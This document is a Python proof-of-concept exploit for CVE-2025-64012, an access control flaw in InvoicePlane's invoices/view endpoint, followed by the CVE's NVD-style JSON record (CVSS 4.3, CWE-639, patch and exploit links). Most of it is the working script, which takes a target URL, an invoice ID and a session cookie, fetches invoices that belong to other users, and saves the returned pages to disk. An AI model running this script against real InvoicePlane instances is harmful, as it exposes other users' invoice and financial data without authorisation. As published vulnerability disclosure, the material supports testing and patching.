CVE-2025-64012

#!/usr/bin/env python3 """ CVE-2025-64012 PoC - InvoicePlane Incorrect Access Control InvoicePlane invoices/view handler fails to verify ownership before returning invoice data. """ import requests import sys from urllib.parse import urljoin def exploit_invoiceplane(target_url, invoice_id, cookies=None): """ Exploit the incorrect access control vulnerability in InvoicePlane's invoices/view endpoint. Args: target_url: Base URL of the InvoicePlane instance invoice_id: Target invoice ID to access (may belong to another user) cookies: Authentication cookies (session cookies) Returns: Response content if successful, None otherwise """ endpoint = f"invoices/view/{invoice_id}" full_url = urljoin(target_url.rstrip('/') + '/', endpoint) try: headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } response = requests.get(full_url, cookies=cookies, headers=headers, timeout=10, allow_redirects=False) return response except requests.RequestException as e: print(f"[-] Request failed: {e}") return None def main(): if len(sys.argv) < 3: print(f"Usage: python3 {sys.argv[0]} <target_url> <invoice_id> [session_cookie]") print(f"Example: python3 {sys.argv[0]} http://localhost:8080 1234 PHPSESSID=abc123") sys.exit(1) target_url = sys.argv[1] invoice_id = sys.argv[2] cookies = {} if len(sys.argv) > 3: cookie_str = sys.argv[3] if '=' in cookie_str: name, value = cookie_str.split('=', 1) cookies[name] = value print(f"[*] Targeting: {target_url}") print(f"[*] Attempting to access invoice ID: {invoice_id}") response = exploit_invoiceplane(target_url, invoice_id, cookies) if response: print(f"[+] Status Code: {response.status_code}") if response.status_code == 200: # Check if sensitive invoice data is returned if 'invoice' in response.text.lower() or 'amount' in response.text.lower(): print("[!] VULNERABLE: Invoice data exposed without ownership verification!") print(f"[*] Response length: {len(response.text)} bytes") # Save response for analysis with open(f'invoice_{invoice_id}_response.html', 'w') as f: f.write(response.text) print(f"[*] Response saved to invoice_{invoice_id}_response.html") else: print("[-] No invoice data found in response") else: print(f"[-] Unexpected status code: {response.status_code}") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-64012", "sourceIdentifier": "[email protected]", "published": "2025-12-16T16:15:59.177", "lastModified": "2025-12-31T00:39:06.250", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "InvoicePlane commit debb446c is vulnerable to Incorrect Access Control. The invoices/view handler fails to verify ownership before returning invoice data."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:invoiceplane:invoiceplane:1.6.1:-:*:*:*:*:*:*", "matchCriteriaId": "286B0215-2841-41B8-B0CB-50FC4C1B4134"}]}]}], "references": [{"url": "https://gist.github.com/tarekramm/797073e9ae991211ff2ae71ed1190c7d", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/InvoicePlane/InvoicePlane/commit/debb446ceaa84efc136987fc1e21b268f34e47b0", "source": "[email protected]", "tags": ["Patch"]}]}}